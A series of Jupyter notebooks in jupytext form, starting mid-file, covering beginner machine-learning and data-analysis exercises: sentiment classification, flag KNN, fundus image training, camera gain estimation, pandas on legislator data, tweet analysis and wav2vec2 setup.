+ "% #Correct:" + str(correct) + " #Tested:" + str(i+1) + " Testing Accuracy:" + str(correct * 100 / float(i+1))[:4] + "%")
def run(self, review):
# Input Layer
# Hidden layer
self.layer_1 *= 0
unique_indices = set()
for word in review.lower().split(" "):
if word in self.word2index.keys():
unique_indices.add(self.word2index[word])
for index in unique_indices:
self.layer_1 += self.weights_0_1[index]
# Output layer
layer_2 = self.sigmoid(self.layer_1.dot(self.weights_1_2))
if(layer_2[0] >= 0.5):
return "POSITIVE"
else:
return "NEGATIVE"
# -
mlp = SentimentNetwork(reviews[:-1000],labels[:-1000],min_count=20,polarity_cutoff=0.05,learning_rate=0.01)
mlp.train(reviews[:-1000],labels[:-1000])
mlp.test(reviews[-1000:],labels[-1000:])
mlp = SentimentNetwork(reviews[:-1000],labels[:-1000],min_count=20,polarity_cutoff=0.8,learning_rate=0.01)
mlp.train(reviews[:-1000],labels[:-1000])
mlp.test(reviews[-1000:],labels[-1000:])
|
w3/sentiment_network/mini_proj_6.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: hackerton
# language: python
# name: hackerton
# ---
pwd
pass_dir = '/home/ssac26/Downloads/wego/ai_test2'
copy_dir = '/home/ssac26/Downloads/wego/ai_test2_1'
# +
import os
import shutil
import cv2
import matplotlib.pyplot as plt
if __name__ == "__main__":
#root_dir = "/home/ssac26/Downloads/wego/[folder]"
for (root, dirs, files) in os.walk(pass_dir):
print("# root : " + root)
if len(dirs) > 0:
for dir_name in dirs:
print("dir: " + dir_name)
if len(files) > 0:
for file_name in files:
if file_name.endswith('.jpg'):
aaa = os.path.join(root, file_name)
pic = cv2.imread(aaa)
height, width = pic.shape[:2]
pic2 = cv2.resize(pic, None, fx=0.3, fy=0.3, interpolation=cv2.INTER_AREA)
cv2.imwrite(os.path.join(copy_dir, file_name), pic2)
elif file_name.endswith('.xml'):
continue
else:
shutil.copy(os.path.join(root ,file_name), copy_dir)
print("file: " + file_name)
# +
#폴더의 모든파일을 읽는 함수
def read_all_file(path):
file_list = []
output = os.listdir(path)
for i in output:
file_list.append(path+'/'+i)
return file_list
# -
filecounts = read_all_file(copy_dir)
txtcount = 0
jpgcount = 0
for i in filecounts:
if 'txt' in i:
txtcount +=1
if 'jpg' in i:
jpgcount += 1
print('txt counts:',txtcount)
print('jpg counts:',jpgcount)
|
copy_file_resize.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
plt.rcParams['figure.figsize'] = (20,20)
import os,time
from glob import glob
from PIL import Image
from sklearn import neighbors
import re
# -
df = pd.read_csv('flags_url.csv')
def read_flag(countrycode='IN',file='', res=(128,64)):
countrycode = countrycode.upper()
#url = df[df['alpha-2']==countrycode].image_url
path = f'flags/{countrycode}.png'
if file!='':
path = file
flag = Image.open(path).convert('RGB').resize(res,)
flag = np.array(flag)
return flag
re.match('set\d+','set10')
# +
name2code = lambda x: df[df.country==x]['alpha-2'].to_list()[0]
set1 = ['Venezuela', 'Ecuador', 'Colombia']
set2 = ['Slovenia', 'Russia', 'Slovakia']
set3 = ['Luxembourg','Netherlands']
set4 = ['Norway','Iceland']
set5 = ['New Zealand', 'Australia']
set6 = ['Indonesia', 'Monaco']
set7 = ['Senegal','Mali']
set8= ['India','Niger']
set9= ['Yemen','Syria']
set10 = ['Mexico','Italy']
sets=[]
local_vars = locals()
for var in local_vars:
if re.match('set\d+',var):
sets += [eval(var)]
#print(sets)
codesets = [ list(map(name2code,s)) for s in sets ]
CATEGORIES = list(map(lambda x: x[0], sets))
allcodes = []
for cs in codesets: allcodes+=cs
CATEGORIES
# +
# Similar Flags Plot
fig,axes = plt.subplots(len(codesets),max(map(len,codesets)))
plt.axis('off')
for idx,similars in enumerate(codesets):
#similars = similars+[[]] if len(similars)==2 else similars
for idy,s in enumerate(similars):
if len(s): axes[idx,idy].imshow(read_flag(s))
#axes[idx,idy].axis('off')
# -
X = np.zeros((len(allcodes),read_flag(allcodes[0]).size))
Y = np.zeros(len(allcodes))
for idx,code in enumerate(allcodes):
# find the category
category = 0
for i,cset in enumerate(codesets):
if code in cset:
category = i
break
x = read_flag(code)
X[idx,:] = x.flatten()
Y[idx] = category
clf = neighbors.KNeighborsClassifier(n_neighbors=len(CATEGORIES), weights='distance')
clf.fit(X,Y)
clf.predict([read_flag(codesets[3][1]).flatten()])
print(df[df['alpha-2']==codesets[9][-1]].image_url.to_list())
alltests = glob('test_flags/*.png')
fig,axes = plt.subplots(len(alltests),2,figsize=(20,40))
for idx,f in enumerate(glob('test_flags/*.png')):
#print(f)
test = read_flag(file=f)
test_big = read_flag(file=f,res=(521,256))
p = clf.predict([test.flatten()])[0]
pname = CATEGORIES[int(p)]
pimg = read_flag(name2code(pname), res=(512,256))
axes[idx][0].imshow(test_big)
axes[idx][1].imshow(pimg)
|
ee250/labML/examples/flags-knn/using_knn.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/hihi5456/pytorch/blob/main/Fundusdata.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + id="i7TZFTXDMW9T" colab={"base_uri": "https://localhost:8080/"} outputId="f189984c-ba38-40ca-edd8-b3631484a2b9"
# !pip install adabelief-pytorch
# !pip install timm
# + id="SXlJpJWjMBAt" outputId="b4ced94a-d934-49f0-8752-feef09e53283" colab={"base_uri": "https://localhost:8080/", "height": 388}
import torchvision
from torchvision import transforms, datasets
import torch.utils.data.dataloader
import matplotlib.pyplot as plt
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import Dataset,ConcatDataset
import adabelief_pytorch
import numpy as np
from sklearn.metrics import roc_auc_score, auc
# + id="GI24FnUUUek5"
from timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD, IMAGENET_INCEPTION_MEAN, IMAGENET_INCEPTION_STD
from timm.models.efficientnet_blocks import round_channels, resolve_bn_args, resolve_act_layer, BN_EPS_TF_DEFAULT
from timm.models.efficientnet_builder import EfficientNetBuilder, decode_arch_def, efficientnet_init_weights
from timm.models.features import FeatureInfo, FeatureHooks
from timm.models.helpers import build_model_with_cfg, default_cfg_for_features
from timm.models.layers import create_conv2d, create_classifier
from timm.models.registry import register_model
import timm
import timm.models.efficientnet
# + id="sJk32gm8MaKw"
device = 'cuda' if torch.cuda.is_available() else 'cpu'
torch.manual_seed(456)
if device =='cuda':
torch.cuda.manual_seed_all(456)
# + id="gUw8KzrIAMoO"
class skipblock(nn.Module):
def __init__(self, in_channel,out_channel,outsize):
super(skipblock, self).__init__()
self.conv0=nn.Conv2d(in_channel,out_channel,1)
self.silu=nn.SiLU()
self.block=nn.Sequential(
nn.Conv2d(out_channel, 64*in_channel, 1),
nn.BatchNorm2d(in_channel*64),
nn.SiLU(),
nn.Dropout2d(),
nn.Conv2d(in_channel*64, in_channel*64, 3, 1, 1),
nn.BatchNorm2d(in_channel*64),
nn.SiLU(),
nn.Dropout2d(),
nn.Conv2d(in_channel*64,out_channel,1),
nn.BatchNorm2d(out_channel),
nn.SiLU(),
nn.Dropout2d(),
)
self.bn=nn.BatchNorm2d(out_channel)
self.pool=nn.AdaptiveAvgPool2d(outsize)
def forward(self, x):
out=self.conv0(x)
out=self.silu(out)
nn.Dropout2d()
skip=out
#print(out.shape)
out=self.block(out)
#print(out.shape)
out=out+skip
#print(out.shape)
out=self.bn(out)
out=self.pool(out)
return out
# + id="KruW8Wp0MsOE"
#gelu=nn.GELU()
class testblock1(nn.Module):
def __init__(self,ni,num_class):
super(testblock1, self).__init__()
self.block0=skipblock(ni,32,300)
self.block1=skipblock(32,3,100)
self.block2=skipblock(3,1,10)
self.classifier = nn.Sequential(
nn.Linear(1*10*10,num_class),
)
def forward(self,x):
out=self.block0(x)
out=self.block1(out)
out=self.block2(out)
out = out.view(out.size(0),-1)
out=self.classifier(out)
return out
# + id="QIUzslrD-3Cw"
model=timm.models.efficientnet_l2(pretrained=False)
model.reset_classifier(39)
model.drop_rate=0.5
model=model.to(device)
# + id="cJDzxyTx_MTq"
# + id="84SWd1P_MvaO"
model=testblock1(3,39).to(device)
# + id="yZuDsLGbUhuf"
model=timm.models.efficientnet.efficientnet_b7(pretrained=False).to(device)
model.reset_classifier(39)
model.drop_rate=0.5
model=model.to(device)
# + colab={"base_uri": "https://localhost:8080/", "height": 340} id="hofEy7-ujMfg" outputId="3ad0d5c0-f1b8-453f-cd90-3587955c4521"
a=torch.rand((1,3,600,600)).to(device)
model(a)
# + id="kTH2gucTMd-I" colab={"base_uri": "https://localhost:8080/"} outputId="0ac9e6ed-7384-4637-c034-f428a188aa9a"
from google.colab import drive
drive.mount("/content/gdrive")
# + id="6BK3ks9mUKVc"
PATH='/content/gdrive/MyDrive/Colab Notebooks/fundusdataset/1000images/'
# + id="jBpvKMsU-PrU"
transform = transforms.Compose(
[
transforms.RandomRotation(45),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Resize((600,600)),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
]
)
# + id="hv9ie854UO21"
fundus_data = torchvision.datasets.ImageFolder(root=PATH,transform=transform)
# + id="sVNkMs9J_6vB"
train_size=int(0.8*len(fundus_data))
test_size=len(fundus_data)-train_size
# + id="IdYKtd5UAge-"
train_set, test_set=torch.utils.data.random_split(fundus_data,[train_size,test_size])
# + id="Tb29JkY2YryJ"
torch.save(train_set,PATH+'trainset.csv')
torch.save(test_set,PATH+'testset.csv')
# + id="fi2t5zzJNKll"
train_set=torch.load(PATH+'trainset.csv')
test_set=torch.load(PATH+'testset.csv')
# + id="Y7s8LnZ7_A6w"
train_loader = torch.utils.data.DataLoader(train_set,drop_last=True,
batch_size=8,
shuffle=True,
num_workers=2,
)
test_loader = torch.utils.data.DataLoader(test_set,
batch_size=1,
shuffle=False,
num_workers=4,
)
# + colab={"base_uri": "https://localhost:8080/"} id="QeoswJ04BYjv" outputId="f6e4b4d4-a495-48c4-9bad-57d2374938b8"
criterion = nn.CrossEntropyLoss().to(device)
#optimizer = torch.optim.Adam(model.parameters(), lr = 0.001)
optimizer=adabelief_pytorch.AdaBelief(model.parameters(),lr=0.001)
#lr_sche = optim.lr_scheduler.StepLR(optimizer, step_size=10, gamma=0.5)
# + colab={"base_uri": "https://localhost:8080/"} id="xOV8Mv4NBfwc" outputId="7c8bd5b9-32ef-4b7b-e73d-e44113a82fe5"
trainedepochs=0
print(len(train_loader))
epochs = 500
for epoch in range(epochs):
model.train()
running_loss = 0.0
for i, data in enumerate(train_loader, 0):
# get the inputs
inputs, labels = data
inputs=inputs.to(device)
labels = labels.to(device)
# zero the parameter gradients
optimizer.zero_grad()
# forward + backward + optimize
outputs = model(inputs)
# (numarray.max()/numarray[labels[0][0].to(torch.int).tolist()-1])
#loss = (1/numnum[labels[0][0].to(torch.int).tolist()-1])*criterion(outputs, labels.to(torch.float)/10)
loss = criterion(outputs, labels)
#print( (numnum.max()/numnum[labels[0][0].to(torch.int).tolist()-1]))
loss.backward()
optimizer.step()
# print statistics
running_loss += loss.item()
if i % 20 == 19:
print('[%d, %5d] loss: %.3f' %
(epoch + 1, i + 1, running_loss / 20))
running_loss = 0.0
#lr_sche.step()
if epoch % 50==49:
correct = 0
total = 0
model.eval()
with torch.no_grad():
for data in test_loader:
images, labels = data
images = images.to(device)
labels = labels.to(device)
outputs = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
#print(predicted ,labels)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the {} test images: {} %%'.format(len(test_set),
100 * correct / total))
#if ( epoch==100 or epoch==150 or epoch==200 or epoch==250 or epoch==300 or epoch==350 or epoch==400 or epoch==450 or epoch==500 or epoch==550):
if (epoch==100 or epoch==200 or epoch==300 or epoch==400 or epoch==500 ):
torch.save(optimizer.state_dict, PATH+'optimizer{}.pt'.format(trainedepochs+epoch))
torch.save(model.state_dict,PATH+'model{}.pt'.format(trainedepochs+epoch))
# loop over the dataset multiple times
#Check Accuracy
#acc = acc_check(resnet50, testloader, epoch, save=1)
torch.save(model.state_dict,PATH+'model{}.pt'.format(trainedepochs+epochs))
torch.save(optimizer.state_dict, PATH+'optimizer{}.pt'.format(trainedepochs+epochs))
print('Finished Training')
# + id="blsQVexeeW6-"
correct = 0
total = 0
model.eval()
with torch.no_grad():
for data in test_loader:
images, labels = data
images = images.to(device)
labels = labels.to(device)
outputs = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
#print(predicted ,labels)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the {} test images: {} %%'.format(len(test_set),
100 * correct / total))
|
Fundusdata.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Estimate the camera gain and offset from experimental data
#
# This notebook presents one approach to estimating the average gain and offset of a camera directly from experimental data. This can be useful if you just want a quick and approximately accurate estimate, or you are tasked with analyzing data that someone else gave you and they don't provide this information. In order to work it relies on the presence of a constant (on the 200 frame time scale) non-uniform background in the experimental data.
#
# Reference:
# * [Kothe et al, Histochemistry and Cell Biology, 2014](https://doi.org/10.1007/s00418-014-1211-4)
#
# ### Configuring the directory
# Create an empty directory somewhere on your computer and tell Python to go to that directory.
# +
import matplotlib.pyplot as pyplot
import numpy
import os
import storm_analysis.sa_library.datareader as dataReader
os.chdir("/home/hbabcock/Data/storm_analysis/jy_testing/")
print(os.getcwd())
numpy.random.seed(1)
# -
# ### Create simulated data
# +
import storm_analysis.jupyter_examples.est_cam_params as est_cam_params
# Create localizations for simulation.
est_cam_params.createLocalizations()
# Create simulated movie (200 frames)
est_cam_params.createMovie(gain = 2.0, offset = 100.0)
# -
# Display an image
# +
import storm_analysis.sa_library.datareader as datareader
frame = datareader.inferReader("test.tif").loadAFrame(5).astype(numpy.float64)
pyplot.figure(figsize = (6, 6))
pyplot.imshow(frame, interpolation = 'nearest', cmap = "gray")
pyplot.show()
# -
# ### Load movie and calculate mean and variance for each pixel
def calcMeanVar(movie_name):
with dataReader.inferReader(movie_name) as dr:
[w,h,l] = dr.filmSize()
if(l>200):
l = 200
n = numpy.zeros((h,w), dtype = numpy.int64)
nn = numpy.zeros((h,w), dtype = numpy.int64)
for i in range(l):
im = dr.loadAFrame(i)
im = im.astype(numpy.int64)
n = n + im
nn = nn + im*im
mean = n/float(l)
var = nn/float(l) - mean*mean
return [mean, var]
[mean, var] = calcMeanVar("test.tif")
# ### Plot data with estimated fit
#
# In this case we know what the actual camera values are so we can just use them. In general the easiest approach is to do the fit by eye, adjusting the gain and offset values to give you a line that goes through the cluster of points at the bottom of the mean vs variance graph. In Kothe et al. the authors estimated the fit using the [RANSAC](https://en.wikipedia.org/wiki/Random_sample_consensus) algorithm.
# +
# You may have to adjust these depending on your data.
x_max = 150
x_min = 100
x = numpy.array([x_min, x_max])
# In this function 100.0 is the offset and 2.0 is the camera gain.
y = (x - 100.0)*2.0
pyplot.scatter(mean,var,s=1)
pyplot.plot(x,y,color = "black")
pyplot.xlim(x_min,x_max)
# You may have to adjust the y range depending on your data.
pyplot.ylim(0,200)
pyplot.show()
|
jupyter_notebooks/estimating_camera_parameters.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Lesson 3 Class Exercises: Pandas Part 1
#
# With these class exercises we learn a few new things. When new knowledge is introduced you'll see the icon shown on the right:
# <span style="float:right; margin-left:10px; clear:both;"></span>
# ## Reminder
# The first checkin-in of the project is due next Tueday. After today, you should have everything you need to know to accomplish that first part.
# ## Get Started
# Import the Numpy and Pandas packages
import numpy as np
import pandas as pd
# ## Exercise 1: Import Iris Data
# Import the Iris dataset made available to you in the last class period for the Numpy part2 exercises. Save it to a variable naemd `iris`. Print the first 5 rows and the dimensions to ensure it was read in properly.
iris = pd.read_csv('../../data/iris.csv')
iris.head(10)
# Notice how much easier this was to import compared to the Numpy `genfromtxt`. We did not have to skip the headers, we did not have to specify the data type and we can have mixed data types in the same matrix.
# ## Exercise 2: Import Legislators Data
# For portions of this notebook we will use a public dataset that contains all of the current legistators of the United States Congress. This dataset can be found [here](https://github.com/unitedstates/congress-legislators).
#
# Import the data directly from this URL: https://theunitedstates.io/congress-legislators/legislators-current.csv
#
# Save the data in a variable named `legislators`. Print the first 5 lines, and the dimensions. You can get the dimensions of the dataframe using the `.shape` member variable.
legislators = pd.read_csv("https://theunitedstates.io/congress-legislators/legislators-current.csv")
legislators.head()
# ## Exercise 3: Explore the Data
# ### Task 1
# Print the column names of the legistators dataframe and explore the type of data in the data frame.
legislators.columns
# ### Task 2
# Show the data types of all of the columns in the legislator data. To do this, use the `.dtypes` member variable. Do all of the data types seem appropriate for the data?
legislators.dtypes
# Show all of the data types in the iris dataframe. To do this, use the `.dtypes` member variable.
iris.dtypes
# ### Task 3
# It's always important to know where the missing values are in your data. Are there any missing values in the legislators dataframe? How many per column?
#
# Hint: we didn't learn how to find missing values in the lesson, but we can use the `isna()` function.
legislators.isna().sum()
# How about in the iris dataframe?
iris.isna().sum()
# ### Task 4
# It is also important to know if you have any duplicated rows. If you are performing statistcal analyses and you have duplicated entries they can affect the results. So, let's find out. Are there any duplicated rows in the legislators dataframe? Print then number of duplicates. If there are duplicates print the rows. What function could we used to find out if we have duplicated rows?
legislators.duplicated().sum()
# Do we have duplicated rows in the iris dataset? Print the number of duplicates? If there are duplicates print the rows.
iris.duplicated().sum()
iris[iris.duplicated()]
# If there are duplicated rows should we remove them or keep them?
# ### Task 5
# It is important to also check that the range of values in our data matches expectations. For example, if we expect to have three species in our iris data, we should check that we see three species. How many political parties should we expect in the legislators data? If we saw not what we expect perhaps the data is incomplete.... Let's check. You can find out how many unique values there are per column using the `.nunique()` function. Try it for both the legislators and the iris data set.
legislators.nunique()
legislators['state'].unique()
iris.nunique()
# What do you think? Do we see what we might expect? Are there fields where this type of check doesn't matter? In what fields might this type of exploration matter?
# Check to see if you have all of the values expected for a given field. Pick a column you know should have a set number of values and print all of the unique values in that column. Do so for both the legislator and iris datasets.
legislators['gender'].unique()
iris['sepal_length'].unique()
# ## Exercise 5: Describe the data
# For both the legislators and the iris data, get descriptive statistics for each numeric field.
iris.describe()
legislators.describe()
# ## Exercise 6: Row Index Labels
# For the legislator dataframe, let's change the row labels from numerical indexes to something more recognizable. Take a look at the columns of data, is there anything you might want to substitue as a row label? Pick one and set the index lables. Then print the top 5 rows to see if the index labels are present.
legislators.index = legislators['last_name']
legislators.head()
legislators.loc['Graham']
# ## Exercise 7: Indexing & Sampling
# Randomly select 15 Republicans or Democrats (your choice) from the senate.
# +
legislators[(legislators['type'] == 'sen') &
(legislators['party'] == 'Democrat')].sample(15)
# -
# ## Exercise 8: Dates
# <span style="float:right; margin-left:10px; clear:both;"></span>
# Let's learn something not covered in the Pandas 1 lesson regarding dates. We have the birthdates for each legislator, but they are in a String format. Let's convert it to a datetime object. We can do this using the `pd.to_datetime` function. Take a look at the online documentation to see how to use this function. Convert the `legislators['birthday']` column to a `datetime` object. Confirm that the column is now a datetime object.
legislators['birthday'] = pd.to_datetime(legislators['birthday'])
legislators['birthday'].head()
# Now that we have the birthdays in a `datetime` object, how can we calculate their age? Hint: we can use the `pd.Timestamp.now()` function to get a datetime object for this moment. Let's subtract the current time from their birthdays. Print the top 5 results.
(pd.Timestamp.now() - legislators['birthday']).head()
# Notice that the result of subtracting two `datetime` objects is a `timedelta` object. It contains the difference between two time values. The value we calculated therefore gives us the number of days old. However, we want the number of years.
#
# To get the number of years we can divide the number of days old by the number of days in a year (i.e. 365). However, we need to extract out the days from the `datetime` object. To get this, the Pandas Series object has an accessor for extracting components of `datetime` objects and `timedelta` objects. It's named `dt` and it works for both. You can learn more about the attributes of this accessor at the [datetime objects page](https://pandas.pydata.org/pandas-docs/stable/reference/series.html#datetime-properties) and the [timedelta objects page](https://pandas.pydata.org/pandas-docs/stable/reference/series.html#timedelta-properties) by clicking. Take a moment to look over that documentation.
#
# How would then extract the days in order to divide by 365 to get the years? Once you've figurd it out. Do so, convert the years to an integer and add the resulting series back into the legislator dataframe as a new column named `age`. Hint: use the [astype](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.Series.astype.html) function of Pandas to convert the type.
legislators['age']=((pd.Timestamp.now() - legislators['birthday']).dt.days /365).astype('int')
# Next, find the youngest, oldest and average age of all legislators
legislators['age'].describe()
# Who are the oldest and youngest legislators?
# +
legislators[(legislators['age'] == legislators['age'].min())]
# -
legislators[(legislators['age'] == legislators['age'].max())]
# ## Exercise 9: Indexing with loc and iloc
# Reindex the legislators dataframe using the state, and find all legislators from a state of your choice using the `loc` accessor.
legislators.index = legislators['state']
legislators.loc['NY']
# Use the loc command to find all legislators from South Carolina and North Carolina
legislators.index = legislators['state']
legislators.loc['SC']
# Use the loc command to retrieve all legislators from California, Oregon and Washington and only get their full name, state, party and age
legislators.loc[['CA', 'OR', 'WA'],['full_name', 'state', 'party', 'age']].head()
legislators.iloc[0:10, [[0 :5]]
|
class_exercises/new/D04-Pandas_Part1.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# +
import tweepy
import pandas as pd
import numpy as np
from datetime import datetime
import matplotlib.pyplot as plt
import seaborn as sns
# %matplotlib inline
# -
# Import keys
from credentials import *
# Setup Twitter API connection
def twitter_setup():
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)
api = tweepy.API(auth)
return api
# +
# Extract Twitter data
extractor = twitter_setup()
tweets = extractor.user_timeline(screen_name='realdonaldtrump', count=200)
print('Number of tweets extracted: {}.\n'.format(len(tweets)))
# Display 5 most recent tweets
print('5 recent tweets:\n')
for idx, tweet in enumerate(tweets[:10]):
# if tweet.text.startswith('RT'):
print("%d.) %s\n" % (idx+1, tweet.text))
# -
if tweet.text.startswith
# +
# Create dataframe
df = pd.DataFrame([tweet.text for tweet in tweets], columns=['Tweets'])
df.head(n=10)
# -
# Explore tweepy object
print(dir(tweets[0]))
# Explore most recent tweet and its properties
print(tweets[0].id)
print(tweets[0].created_at)
print(tweets[0].source)
print(tweets[0].favorite_count)
print(tweets[0].favorited)
print(tweets[0].retweet_count)
print(tweets[0].retweeted)
print(tweets[0].geo)
print(tweets[0].coordinates)
print(tweets[0].entities)
# Add columns to df
df['len'] = np.array([len(tweet.text) for tweet in tweets])
df['ID'] = np.array([tweet.id for tweet in tweets])
df['Date'] = np.array([tweet.created_at for tweet in tweets])
df['Source'] = np.array([tweet.source for tweet in tweets])
df['Likes'] = np.array([tweet.favorite_count for tweet in tweets])
df['Retweets'] = np.array([tweet.retweet_count for tweet in tweets])
# Show first 10 records
df.head()
# Show datatypes
df.info(null_counts=True, memory_usage='deep')
df.describe()
# Sort by various ways
df.sort_values(['Likes', 'len'], ascending=False).head()
# Explore likes histogram
ax = df.Likes.value_counts().hist()
ax.set_title('Number of Likes vs. Number of Tweets')
ax.set_xlabel('No. of Tweets')
ax.set_ylabel('No. of Likes')
# Which tweets received zero likes?
df[df.Likes == 0].tail()
# Group by day
df.groupby([df.Date.dt.month, df.Date.dt.day]).count().Tweets
# key step!
df.index = df['Date']
# convert utc to est? Find out what tz it is first.
df.groupby(df.index.tz_localize('GMT').tz_convert('US/Eastern').hour).count().Tweets.plot(kind='barh')
df.groupby(df.index.tz_localize('GMT').tz_convert('US/Eastern').hour).count().Tweets
df.groupby(df.index.tz_localize('GMT').tz_convert('US/Eastern').hour).count().Tweets.max
df.groupby(df.index.tz_localize('GMT').tz_convert('US/Eastern').hour).count().Tweets.max
xticks_12 = ['12 AM', '1 AM', '2 AM', '3 AM', '4 AM', '5 AM', '6 AM', '7 AM', '8 AM', '9 AM', '10 AM', '11 AM',
'12 PM', '1 PM', '2 PM', '3 PM', '4 PM', '5 PM', '6 PM', '7 PM', '8 PM', '9 PM', '10 PM', '11 PM']
# Show GMT to EDT
df.index.tz_localize('GMT').tz_convert('US/Eastern')
# Time format x-axis to 12-o'clock time
xticks = pd.date_range('00:00', '23:00', freq='H', tz='US/Eastern').map(lambda x: pd.datetime.strftime(x, '%I %p'))
xticks
# +
# pd.date_range?
# -
# Convert from GMT to US EST.
ax = df.groupby(df.index.tz_localize('GMT').tz_convert('US/Eastern').hour).count().Tweets.plot(kind='bar')
ax.set_xticks(np.arange(24))
ax.set_xticklabels(xticks, rotation=45)
ax.set_title('Number of Tweets vs. Time')
ax.set_xlabel('Time (h)')
ax.set_ylabel('No. of Tweets')
df.groupby(df.index.weekday_name).count().Tweets.sort_values(ascending=False)
df.groupby(df.index.hour).count().Tweets.plot
# Compute metrics
mean = np.mean(df.len)
print('Tweet length average is: {}\n'.format(mean))
# +
# Get most-liked and retweeted tweet
fav_max = np.max(df.Likes)
rt_max = np.max(df.Retweets)
fav_idx = df[df.Likes == fav_max].index[0]
rt_idx = df[df.Retweets == rt_max].index[0]
# Max favorite tweet:
print("Most liked tweet is:")
print("%s" % df['Tweets'][fav_idx])
print("Number of likes: {}".format(fav_max))
print("{} characters.\n".format(df['len'][fav_idx]))
# Max retweeted tweet:
print("Most retweeted tweet is:")
print("%s" % df['Tweets'][rt_idx])
print("Number of likes: {}".format(rt_max))
print("{} characters.\n".format(df['len'][rt_idx]))
# -
# Construct pandas Series objects
time_length = pd.Series(df.len.values, index=df.Date)
time_favorite = pd.Series(df.Likes.values, index=df.Date)
time_retweet = pd.Series(df.Retweets.values, index=df.Date)
# plot Series obj
ax = time_length.plot(figsize=(16,4), color='r', title='Tweet length vs. DateTime')
ax.set_xlabel("DateTime")
ax.set_ylabel("Tweet length")
# Plot Likes and retweets over time:
time_favorite.plot(figsize=(16,4), label="Likes", legend=True, title="Likes & Retweets vs. DateTime")
ax = time_retweet.plot(figsize=(16,4), label="Retweets", legend=True)
ax.set_xlabel("DateTime")
ax.set_ylabel("Total (k)")
# +
# Get sources
sources = []
for source in df.Source:
if source not in sources:
sources.append(source)
# Print sources
print("Tweet created using:")
for source in sources:
print("* {}".format(source))
# +
# Create a pie chart of sources:
percent = np.zeros(len(sources))
for source in df.Source:
for idx in range(len(sources)):
if source == sources[idx]:
percent[idx] += 1
pass
percent /= 100
pie_chart = pd.Series(percent, index=sources, name='Platform sources')
pie_chart.plot.pie(fontsize=11, autopct='%.2f', figsize=(6, 6))
|
develop/20170924_initial_testing_stuff_out.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="Ar6WxXxBzAuk"
# This notebook is inspired from a very good [HuggingFace Tutorial](https://colab.research.google.com/github/patrickvonplaten/notebooks/blob/master/Fine_Tune_XLSR_Wav2Vec2_on_Turkish_ASR_with_%F0%9F%A4%97_Transformers.ipynb#scrollTo=bTjNp2KUYAl8)
# + [markdown] id="2xpl09xvO7hm"
# # pip install
# + colab={"base_uri": "https://localhost:8080/"} id="-3tuYZdqPADr" executionInfo={"elapsed": 19334, "status": "ok", "timestamp": 1616488973694, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="ee6759db-0ef6-4f98-ec02-345634bad734"
# !pip install phonemizer
# !apt-get install espeak
# + [markdown] id="zudrwLDGO9rY"
# # notebook
# + colab={"base_uri": "https://localhost:8080/"} id="qQBWJA2jMNaD" executionInfo={"status": "ok", "timestamp": 1616608629320, "user_tz": -60, "elapsed": 802, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}} outputId="134c002b-de05-479a-956c-f033be77f911"
# !nvidia-smi -L
# + id="hlaKDvP4mpq6" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1616608662705, "user_tz": -60, "elapsed": 21392, "user": {"displayName": "Omar US", "photoUrl": "", "userId": "02556879631367095259"}} outputId="c7cf96ff-2a11-4c1d-e1c5-582aa3c8bd48"
from google.colab import drive
drive.mount('/content/drive')
# + id="Dj-n0wsCMIAf"
# !pip install git+https://github.com/huggingface/datasets.git
# !pip install git+https://github.com/huggingface/transformers.git
# !pip install torchaudio
# !pip install librosa
# !pip install jiwer
# + id="RK0f5qB2WylF" executionInfo={"status": "ok", "timestamp": 1616608750181, "user_tz": -60, "elapsed": 7076, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}}
# Import libraries
from datasets import load_dataset, load_metric, ClassLabel, load_from_disk
import datasets
datasets.set_caching_enabled(False)
import torchaudio
import librosa
import torch
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional, Union
from transformers import Wav2Vec2CTCTokenizer, Wav2Vec2FeatureExtractor, Wav2Vec2Processor, Wav2Vec2ForCTC
from transformers import TrainingArguments, Trainer, AdamW, get_linear_schedule_with_warmup, get_polynomial_decay_schedule_with_warmup
from transformers import set_seed
